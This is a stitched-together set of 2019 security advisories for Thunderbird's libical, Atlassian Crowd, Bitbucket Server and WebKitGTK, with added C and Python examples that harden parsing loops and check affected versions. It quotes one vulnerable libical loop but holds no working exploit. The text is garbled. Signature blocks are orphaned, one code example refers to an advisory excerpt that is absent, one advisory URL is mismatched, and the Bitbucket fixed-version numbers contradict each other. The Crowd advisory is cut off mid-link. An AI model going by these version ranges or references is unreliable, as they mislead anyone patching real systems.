-BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtJsACgkQo5Klpg50 CxALNg//RiEGsoszNtnBzS/tvL5UIniG6oBXHaqu+9XZUJeM+tYzs4Z3JvvHWx1y exGt3nM3PMXgw21lr8NumJGHibMDckIrOIpetphg9GqRfk/iS4NivcHcbhSq7sNz NajGpulM6HtgDflFgpB1GKfekE/DJlbiULq5SBgv/bARRARGGgGNtWp863sQPKG+ rvjSOnTyQw1ypYjozMYrmUasgC4jsLmB0LUIWqHy6lEN5OWehnO9pOpiV8xTA0qc Y9C0IDkf6YGH6xwOxaUXc9HXGBOiQATexNGOtOmWoUsg7cpRdnuoo8YOP9V+kbeX OK301LlXUtt0th5zu6tVGo4WK75sI8gmpxUtcbIyCxTzRC7fqAlbHGaKlQURZ23s /2Tv5pzpBBjIO4T2t8v1O/10pDyfH2zUCXik3il2GY+zpNprR1Va6asB4y3nEPl1 ghLYCjHt58CZJZILMmK/lZap6I3ea9UaW3TsZuC07zv8A9bf+I6xcgA0+4Ms6e0P 1d1T/ygVluKRay5fgiiubTYAqtngFTOXMCioj/JmeDvL+wTYpwduukhZxDuGT6P/ OV0MuvDW1RQpj2hsw+dbcVnE+Y7X/WZDVbq3ByOj5VQz/mTPkcGaJVh37kI9Sp6A YFJYuJrFqmdMFh365aUmAOp26hYdY9++wwWAqAlYAVFjLXst5is= =E1se -END PGP SIGNATURE-
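A bounded counterpart to the `icalrecur_add_bydayrules()` loop in the advisory above, as an added C example that is neither the advisory's nor libical's code. It parses a comma-separated BYDAY list into a fixed-size `short` array with the same `sign * (weekday + 8 * weekno)` encoding the excerpt uses, but checks the index against the array capacity before every write and rejects a `weekno` outside RFC 5545's 1..53 range. The array size (`BY_DAY_SIZE`), the `ARRAY_MAX` terminator value and the weekno bound are this example's assumptions, not values quoted from the Thunderbird fork.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Capacity of the BYDAY array: 7 weekdays times 8 week slots plus one
 * terminator. Assumption for this example; upstream libical uses its own
 * ICAL_BY_DAY_SIZE constant. */
#define BY_DAY_SIZE (7 * 8 + 1)
/* Stand-in for ICAL_RECURRENCE_ARRAY_MAX, the terminator the excerpt writes. */
#define ARRAY_MAX   0x7f7f

enum { NO_WEEKDAY = 0, SU = 1, MO, TU, WE, TH, FR, SA };

static int weekday_from_text(const char *t)
{
    static const char *const names[] = { "SU", "MO", "TU", "WE", "TH", "FR", "SA" };
    for (int i = 0; i < 7; i++)
        if (strcmp(t, names[i]) == 0) return i + 1;
    return NO_WEEKDAY;
}

/* Parse one BYDAY token ("MO", "+2TU", "-1FR") into the excerpt's encoding,
 * sign * (weekday + 8 * weekno). Returns 0 on a malformed token. */
static int parse_byday_token(const char *tok, short *out)
{
    int sign = 1;
    long weekno = 0;
    const char *p = tok;
    if (*p == '-')      { sign = -1; p++; }
    else if (*p == '+') { p++; }
    if (isdigit((unsigned char)*p)) {
        char *end;
        weekno = strtol(p, &end, 10);
        if (weekno < 1 || weekno > 53) return 0;   /* RFC 5545 ordwk range (assumption) */
        p = end;
    }
    int wd = weekday_from_text(p);
    if (wd == NO_WEEKDAY) return 0;
    *out = (short)(sign * (wd + 8 * (int)weekno));
    return 1;
}

/* Hardened counterpart of the excerpt's loop: before every write the index
 * is checked against the capacity, keeping one slot for the terminator, so a
 * rule carrying too many BYDAY entries, or an unparsable one, is rejected
 * instead of being written past the end of `array`.
 * Returns the number of entries stored, or -1. */
int add_bydayrules(const char *vals, short *array, size_t capacity)
{
    if (capacity == 0) return -1;
    size_t i = 0;
    const char *p = vals;
    for (;;) {
        const char *comma = strchr(p, ',');
        size_t len = comma ? (size_t)(comma - p) : strlen(p);
        char tok[16];
        short v;
        if (len == 0 || len >= sizeof tok) return -1;
        memcpy(tok, p, len);
        tok[len] = '\0';
        if (i + 1 >= capacity || !parse_byday_token(tok, &v)) return -1;
        array[i++] = v;
        array[i] = ARRAY_MAX;
        if (!comma) break;
        p = comma + 1;
    }
    return (int)i;
}

/* Parses into a BY_DAY_SIZE array and returns entry idx, or ARRAY_MAX if
 * parsing failed or idx is out of range. */
short byday_entry(const char *vals, size_t idx)
{
    short arr[BY_DAY_SIZE];
    if (add_bydayrules(vals, arr, BY_DAY_SIZE) < 0 || idx >= BY_DAY_SIZE) return ARRAY_MAX;
    return arr[idx];
}

/* Builds "tok,tok,..." with n copies and parses it: n beyond the capacity is
 * exactly what the unchecked loop would have written past the stack array. */
int byday_repeat_count(const char *tok, int n)
{
    size_t tl = strlen(tok);
    char *buf = malloc((size_t)n * (tl + 1) + 1);
    if (!buf) return -1;
    char *w = buf;
    for (int k = 0; k < n; k++) {
        if (k) *w++ = ',';
        memcpy(w, tok, tl);
        w += tl;
    }
    *w = '\0';
    short arr[BY_DAY_SIZE];
    int r = add_bydayrules(buf, arr, BY_DAY_SIZE);
    free(buf);
    return r;
}

int main(void)
{
    /* Constructed inputs: a sane rule, and lists at and one past capacity. */
    short arr[BY_DAY_SIZE];
    printf("MO,+2TU,-1FR -> %d entries\n", add_bydayrules("MO,+2TU,-1FR", arr, BY_DAY_SIZE));
    printf("%d x MO -> %d\n", BY_DAY_SIZE - 1, byday_repeat_count("MO", BY_DAY_SIZE - 1));
    printf("%d x MO -> %d (rejected)\n", BY_DAY_SIZE, byday_repeat_count("MO", BY_DAY_SIZE));
    return 0;
}
```

The check `i + 1 >= capacity` is the whole fix for the index side: the excerpt writes two slots per iteration (the value and the terminator), so room for both must exist before either write happens.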
X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-002

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11703
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1281041 and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that's easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalparser.c `parser_get_next_char()` can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. The issue initially manifests as an out-of-bounds read, but we do not rule out that it could later lead to an out-of-bounds write. It is expected that an attacker can exploit this vulnerability to achieve remote code execution.

Proof of Concept
================
A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2016-06-20 Issue reported by Brandon Perry to the vendor
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtHsACgkQo5Klpg50
CxD5DRAAnruhd0PEjQV3ELUiM/9PHe5hC8rpWLqPNcuDY/dbPvg4w1qOAoXops9e
d3hJlMM2zaUeAv5MZGgxT7FIO116IFafALMjMssIC9zw3yM9oKF4s1amL/GzF+P9
vMamD3A5t5j2mHYuWFaDe+bcHak8QfmVgSRqKNvNp/rF27oWE3SgCraYFP1+RlpR
s0qbFcjLdo9SBqvpbSt3cbolrIOiS2nXER1cthmd2Ig7ga3oElEfWKZ19d+twBxx
oKqtS607p9ASfql29HDwC0VtgQPx1ySRBestYDtjsD2d97bAaAhA2/Kkpx6A/H91
EbiSyKByO3vs+nQzTdkI/xNN9edBly6se3WKaDBIfZOzWCsXwcUtUKpnAw5YMf/n
BoaDzv/D70Sk3GfXOD9qb2bMNFCEQdeZh3O1Tmmzi3kXa9kQJfdIDdjfeeDd7h87
r6vtYeHA7mVM2BGteO5FHQhooJVSi+gcGg9esj5656YznRS9zbc7KgkWJiItwMhj
hiBL7r8v2M0Gzx4qhhCg+gxl+ikBaYCgZh9WGi4fsekwufwEnnCnQxN52ZE9vBia
BJJGpPbGkVaxDCJXOfQDvJiovbG4ekK54tavqLBXaH/KuucMFGaE95gPSKnxn8LD
0QwpeLzad2bSiolSHux5RBR/t5d4znzjce/qxIpRQdWcgu9kzTs=
=1OOu
-----END PGP SIGNATURE-----
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that's easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalvalue.c `icalmemory_strdup_and_dequote()` can be triggered while parsing a calendar attachment containing a malformed or specially crafted string.

~~~
static char *icalmemory_strdup_and_dequote(const char *str)
{
    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
    char *pout = out;
    // ...
    for (p = str; *p != 0; p++) {
        if (*p == '\\') {
            p++;
            // ...
        } else {
            *pout = *p;
        }
    }
~~~

Bounds checking in `icalmemory_strdup_and_dequote()` can be bypassed when the input `p` ends with a backslash: the `p++` after the backslash lands on the terminating NUL, and the loop's own `p++` then steps past it, which enables an attacker to read out of bounds of the input buffer and write out of bounds of the heap-allocated output buffer. The issue manifests in several ways, including out-of-bounds read and write and null-pointer dereference, and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution.

Proof of Concept
================
A reproducer EML file can be found in: https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.
-BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtFQACgkQo5Klpg50 CxDziQ/+JVKmkCHu3UXeNTrf3nFAcg3pzopaADVMK4yo7P/iQW/HMtvlz3sbi/ND 8nkTzXjPwTXmPZqrcr8X28lsffx2wu4ehIZNp2izTkfQkbIeA0co1bM2KhGJU+p+ GQP8yGsVi00+UvQfd5KxB4ydc7/Q4nTFH325yx7D4OHW/rDuETt5p8h1h7zmFBW+ SV09t4qQQx8HeWj2pQS6wF6pWo80/nqJbS8f540PQ+XTysvYsflxiybAqYK2mW2j QzvjT/YosR39JCMHBKscptwVgJFT6b2DsSq+Lt+1BTn0Ef0XoIY/rMvLFX1ww8HK nsViFPjtyhkX7CftIjZK6y4oK4nKsgyDiOieNKodfkr1jTmipUIIjwtGM99pKcv2 wNDY4ySB7RSbW+W+yrWc75vEX+Ev1enXkeM6xcJiPO0CiWfceZpVzZVcjoFqt9H6 57Uy10OMzZDi3reIMsMs3SxpRyXQqcyjlPkk7PlkzHx2XjAMKqwW6t5QZwMpIHrm M4BQOzxz9UuhnfZI80ZmJhYCh9zOOdjmJXGxOp5cB1GSXjQQ7PH/0aqTbfI0Hp+b uxqXsxBJ0YTO0qhHluuPkInqLEKlewHvNT4P5YE7US3TNCHPuei7P3zTq7fqSPjW sgj9XXjf4cbB7N+txXnq55BpHemGKAd4spgvQvo0L35m2RribBs= =sYWR -END PGP SIGNATURE-
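The trailing-backslash case from the X41-2019-001 analysis, as an added C example that is neither the advisory's nor libical's code. `original_loop_overruns()` replays the index arithmetic of the excerpt's loop to report where it would step past the terminator, without ever reading beyond it; `dequote_fixed()` is this example's own hardened version, which stops at a backslash in the last position and therefore never emits more than `strlen(str)` bytes into the `strlen(str) + 1` output allocation. The escape table it applies (`\n`, `\t` and the iCalendar TEXT escapes for `;`, `,` and `\`) is an assumption; the excerpt elides that part of the function.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Replays the control flow of the excerpt's loop on an index instead of a
 * pointer: returns 1 if, on this input, the inner p++ would land on the NUL
 * terminator, after which the for-loop's own p++ steps past the end of the
 * input. Nothing beyond the terminator is ever read here. */
int original_loop_overruns(const char *str)
{
    for (size_t i = 0; str[i] != '\0'; i++) {
        if (str[i] == '\\') {
            i++;                    /* the excerpt's p++ after a backslash */
            if (str[i] == '\0')     /* now on the terminator ... */
                return 1;           /* ... and the loop increment would go past it */
        }
    }
    return 0;
}

/* Hardened copy-and-dequote. A backslash that is the last character ends
 * the scan instead of being skipped over. Every iteration consumes at least
 * one input byte and emits at most one output byte, so the strlen(str) + 1
 * allocation is always sufficient. */
char *dequote_fixed(const char *str)
{
    size_t len = strlen(str);
    char *out = malloc(len + 1);
    if (!out) return NULL;
    char *pout = out;
    for (const char *p = str; *p != '\0'; p++) {
        if (*p == '\\') {
            p++;
            if (*p == '\0') break;  /* trailing backslash: stop, do not read on */
            switch (*p) {
            case 'n': case 'N': *pout++ = '\n'; break;
            case 't': case 'T': *pout++ = '\t'; break;
            case ';': case ',': case '\\': *pout++ = *p; break;
            default:            *pout++ = *p; break;   /* unknown escape: keep the char */
            }
        } else {
            *pout++ = *p;
        }
    }
    *pout = '\0';
    return out;
}

int main(void)
{
    /* Constructed inputs: a normal escaped TEXT value and one ending in a backslash. */
    const char *inputs[] = { "Line one\\nLine two\\; done", "Meeting\\" };
    for (size_t i = 0; i < 2; i++) {
        char *clean = dequote_fixed(inputs[i]);
        printf("%-28s original loop overruns: %d, fixed output: \"%s\"\n",
               inputs[i], original_loop_overruns(inputs[i]),
               clean ? clean : "(alloc failed)");
        free(clean);
    }
    return 0;
}
```

An escaped backslash at the very end (`"a\\\\"` in C, i.e. the two characters `\\`) is not the dangerous case: the second backslash is consumed as the escaped character and the loop ends normally. Only an odd, unpaired backslash in the last position moves the cursor onto the terminator.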
Crowd Security Advisory - 2019-05-22
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This email refers to the advisory found at https://confluence.atlassian.com/x/3ADVOQ .

CVE ID:

* CVE-2019-11580.

Product: Crowd and Crowd Data Center.

Affected Crowd and Crowd Data Center product versions:

2.1.0 <= version < 3.0.5
3.1.0 <= version < 3.1.6
3.2.0 <= version < 3.2.8
3.3.0 <= version < 3.3.5
3.4.0 <= version < 3.4.4

Fixed Crowd and Crowd Data Center product versions:

* Crowd and Crowd Data Center 3.0.5 have been released with a fix for this issue.
* for 3.1.x, Crowd and Crowd Data Center 3.1.6 have been released with a fix for this issue.
* for 3.2.x, Crowd and Crowd Data Center 3.2.8 have been released with a fix for this issue.
* for 3.3.x, Crowd and Crowd Data Center 3.3.5 have been released with a fix for this issue.
* for 3.4.x, Crowd and Crowd Data Center 3.4.4 have been released with a fix for this issue.

Summary:

This advisory discloses a critical severity security vulnerability. Versions of Crowd and Crowd Data Center starting with version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

Customers who have upgraded Crowd and Crowd Data Center to version 3.0.5, 3.1.6, 3.2.8, 3.3.5 or 3.4.4 are not affected.

Customers who have downloaded and installed any of the following versions should upgrade their Crowd and Crowd Data Center installations immediately to fix this vulnerability:

* Crowd and/or Crowd Data Center >= 2.1.0 but less than 3.0.5 (the fixed version for 3.0.x)
* Crowd and Crowd Data Center >= 3.1.0 but less than 3.1.6 (the fixed version for 3.1.x)
* Crowd and Crowd Data Center >= 3.2.0 but less than 3.2.8 (the fixed version for 3.2.x)
* Crowd and Crowd Data Center >= 3.3.0 but less than 3.3.5 (the fixed version for 3.3.x)
* Crowd and Crowd Data Center >= 3.4.0 but less than 3.4.4 (the fixed version for 3.4.x)

pdkinstall development plugin incorrectly enabled - CVE-2019-11580

Severity:

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description:

Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.

Versions of Crowd and Crowd Data Center starting with version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.

This issue can be tracked at: https://jira.atlassian.com/browse/CWD-5388 .

Fix:

To address this issue, we've released the following versions containing a fix:

* Crowd and Crowd Data Center version 3.0.5
* Crowd and Crowd Data Center version 3.1.6
* Crowd and Crowd Data Center version 3.2.8
* Crowd and Crowd Data Center version 3.3.5
* Crowd and Crowd Data Center version 3.4.4

Remediation:

Atlassian recommends that customers running a version of Crowd below 3.3.0 upgrade to version 3.2.8 to avoid https://jira.atlassian.com/browse/CWD-5352; customers running version 3.3.0 or later should upgrade to the latest version.

The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately.

If you are running Crowd and Crowd Data Center 3.1.x and cannot upgrade to 3.4.4, upgrade to version 3.1.6.
If you are running Crowd and Crowd Data Center 3.2.x and cannot upgrade to 3.4.4, upgrade to version 3.2.8.
If you are running Crowd and Crowd Data Center 3.3.x and cannot upgrade to 3.4.4, upgrade to version 3.3.5.

For a full description of the latest version of Crowd and Crowd Data Center, see the release notes found at https://confluence.atlassian.com/display/CROWD/Crowd+Release+Notes. You can download the latest version of Crowd and Crowd Data Center from the download centre found at https://www.atlassian.com/software/crowd/download.

Support:

If you have questions or concerns regarding this advisory, please raise a support request at https://
Bitbucket Server security advisory 2019-05-22
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/x/V87JOQ . CVE ID: * CVE-2019-3397. Product: Bitbucket Server. Affected Bitbucket Server product versions: 5.13.0 <= version < 5.13.5 5.14.0 <= version < 5.14.3 5.15.0 <= version < 5.5.2 6.0.0 <= version < 6.0.3 6.1.0 <= version < 6.1.1 Fixed Bitbucket Server product versions: * for 5.13.x, Bitbucket Server 5.13.5 has been released with a fix for this issue. * for 5.14.x, Bitbucket Server 5.14.3 has been released with a fix for this issue. * for 5.15.x, Bitbucket Server 5.5.2 has been released with a fix for this issue. * for 6.0.x, Bitbucket Server 6.0.3 has been released with a fix for this issue. * for 6.1.x, Bitbucket Server 6.1.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Bitbucket Server starting with 5.13.0 before 5.13.6 (the fixed version for 5.13.x), from 5.14.0 before 5.14.4 (fixed version for 5.14.x), from 5.15.0 before 5.15.3 (fixed version for 5.13.x), from 6.0.0 before 6.0.3 (fixed version for 6.0.x), and from 6.1.0 before 6.1.2 (the fixed version for 6.1.x) are affected by this vulnerability. Customers who have upgraded Bitbucket Server to version 5.13.6 or 5.14.4 or 5.15.3 or 6.0.3 or 6.1.2 are not affected. 
Customers who have downloaded and installed Bitbucket Server >= 5.13.0 but less than 5.13.6 (the fixed version for 5.13.x), or Bitbucket Server >= 5.14.0 but less than 5.14.4 (the fixed version for 5.14.x), or Bitbucket Server >= 5.15.0 but less than 5.15.3 (the fixed version for 5.15.x), or Bitbucket Server >= 6.0.0 but less than 6.0.3 (the fixed version for 6.0.x), or Bitbucket Server >= 6.1.0 but less than 6.1.2 (the fixed version for 6.1.x): please upgrade your Bitbucket Server installations immediately to fix this vulnerability.

Path traversal in the migration tool RCE (CVE-2019-3397)

Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment.

Description: Bitbucket Data Center had a path traversal vulnerability in the Data Center migration tool. A remote attacker authenticated as a user with admin permissions can exploit this path traversal vulnerability to write files to arbitrary locations, which can lead to remote code execution on systems that run a vulnerable version of Bitbucket Data Center. Bitbucket Server versions without a Data Center license are not vulnerable to this vulnerability. Versions of Bitbucket Server starting with 5.13.0 before 5.13.6 (the fixed version for 5.13.x), from 5.14.0 before 5.14.4 (the fixed version for 5.14.x), from 5.15.0 before 5.15.3 (the fixed version for 5.15.x), from 6.0.0 before 6.0.3 (the fixed version for 6.0.x), and from 6.1.0 before 6.1.2 (the fixed version for 6.1.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/BSERV-11706 .
Fix: To address this issue, we've released the following versions containing a fix:
* Bitbucket Server version 5.13.6
* Bitbucket Server version 5.14.4
* Bitbucket Server version 5.15.3
* Bitbucket Server version 6.0.3
* Bitbucket Server version 6.1.2

Remediation: Upgrade Bitbucket Server to version 6.1.2 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately.
If you are running Bitbucket Server 5.13.x and cannot upgrade to 6.1.2, upgrade to version 5.13.6.
If you are running Bitbucket Server 5.14.x and cannot upgrade to 6.1.2, upgrade to version 5.14.4.
If you are running Bitbucket Server 5.15.x and cannot upgrade to 6.1.2, upgrade to version 5.15.3.
If you are running Bitbucket Server 6.0.x and cannot upgrade to 6.1.2, upgrade to version 6.0.3.
For a full description of the latest version of Bitbucket Server, see the release notes found at https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Server+release+notes. You can download the latest version of Bitbucket Server from the download centre found at https://www.atlassian.com/software/bitbucket/download.

Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/.

-BEGIN PGP SIGNATURE-
iQIzBAEBCAAdFiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAlzl3DEACgkQJCCXorxS
dqCoZQ/+NGRDr27asjsEg1d9ft2qC/hl+0B2jFaOg3rJoZYBUyPJUNL59pgayu2x
99/NleRCU12VNK4xenhQGHPwbDXfvAh7eSuWksc0q+gN9VudqVZhnKNKZKajn9H3
pfESjk8e2sEVUEtHOKX4RjYd95VrTwFQdVagyu8fUSkHfQa1DU3sEmYqO67ySH6d
R6pxSaEQVhpQgFkZrTY
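A small affected-version check for this advisory, as an added example (not Atlassian's tooling): it encodes the affected/fixed ranges that the Fix section gives for CVE-2019-3397 and the caveat from the description that Server installs without a Data Center license are not vulnerable, and classifies a build string against them. The only inputs are the ranges table, a version string and the license flag; the version strings used at the bottom are constructed. Any other product's ranges (for example the Crowd fix versions above) would be supplied in the same (first affected, first fixed) form.

```python
"""Classify a Bitbucket Server build against the CVE-2019-3397 advisory ranges.

Added example; not Atlassian code. Ranges are the ones the advisory's
"Fix" section lists: affected from <first affected> up to but excluding
<first fixed> on each release line.
"""

# (first affected, first fixed) per release line, from the advisory text.
CVE_2019_3397_RANGES = [
    ((5, 13, 0), (5, 13, 6)),
    ((5, 14, 0), (5, 14, 4)),
    ((5, 15, 0), (5, 15, 3)),
    ((6, 0, 0), (6, 0, 3)),
    ((6, 1, 0), (6, 1, 2)),
]


def parse_version(text):
    """Turn '5.15.2' into (5, 15, 2); a '-suffix' such as '-rc1' is ignored."""
    core = text.strip().split("-", 1)[0]
    parts = core.split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError("unparseable version: %r" % text)
    return tuple(int(p) for p in parts)


def affected_range(version, ranges=CVE_2019_3397_RANGES):
    """Return the (first affected, first fixed) pair the version falls in, else None.

    Tuple comparison is lexicographic, so (5, 15, 2) < (5, 15, 3) and
    (5, 15, 3) is correctly outside the half-open range.
    """
    for lo, fixed in ranges:
        if lo <= version < fixed:
            return lo, fixed
    return None


def assess(version_text, data_center_licensed):
    """Classify a build as the advisory would.

    Returns one of:
      ("vulnerable", fix)             -- in a listed range, Data Center licensed
      ("in-range-no-dc-licence", fix) -- in a listed range, but the advisory says
                                         Server without a DC license is not vulnerable
      ("not-listed", None)            -- outside every range the advisory names; this
                                         is not a statement that unlisted (e.g. older,
                                         unsupported) lines are safe
    """
    hit = affected_range(parse_version(version_text))
    if hit is None:
        return ("not-listed", None)
    fix = ".".join(str(n) for n in hit[1])
    if not data_center_licensed:
        return ("in-range-no-dc-licence", fix)
    return ("vulnerable", fix)


if __name__ == "__main__":
    # Constructed inputs, not real inventory data.
    for build, dc in (("5.15.2", True), ("6.0.2", False), ("6.1.2", True)):
        print(build, "DataCenter" if dc else "Server", "->", assess(build, dc))
```

The "not-listed" outcome deserves care in an inventory sweep: the advisory enumerates only the supported lines, so a 5.12.x host falls outside every range without the advisory saying anything about it.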
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0003
WebKitGTK and WPE WebKit Security Advisory                    WSA-2019-0003

Date reported           : May 20, 2019
Advisory ID             : WSA-2019-0003
WebKitGTK Advisory URL  : https://webkitgtk.org/security/WSA-2019-0003.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0003.html
CVE identifiers         : CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615, CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623.

Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.

CVE-2019-6237
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8571
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to 01 working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8583
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8584
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8586
    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to an anonymous researcher.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8587
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to G. Geshev working with Trend Micro Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8594
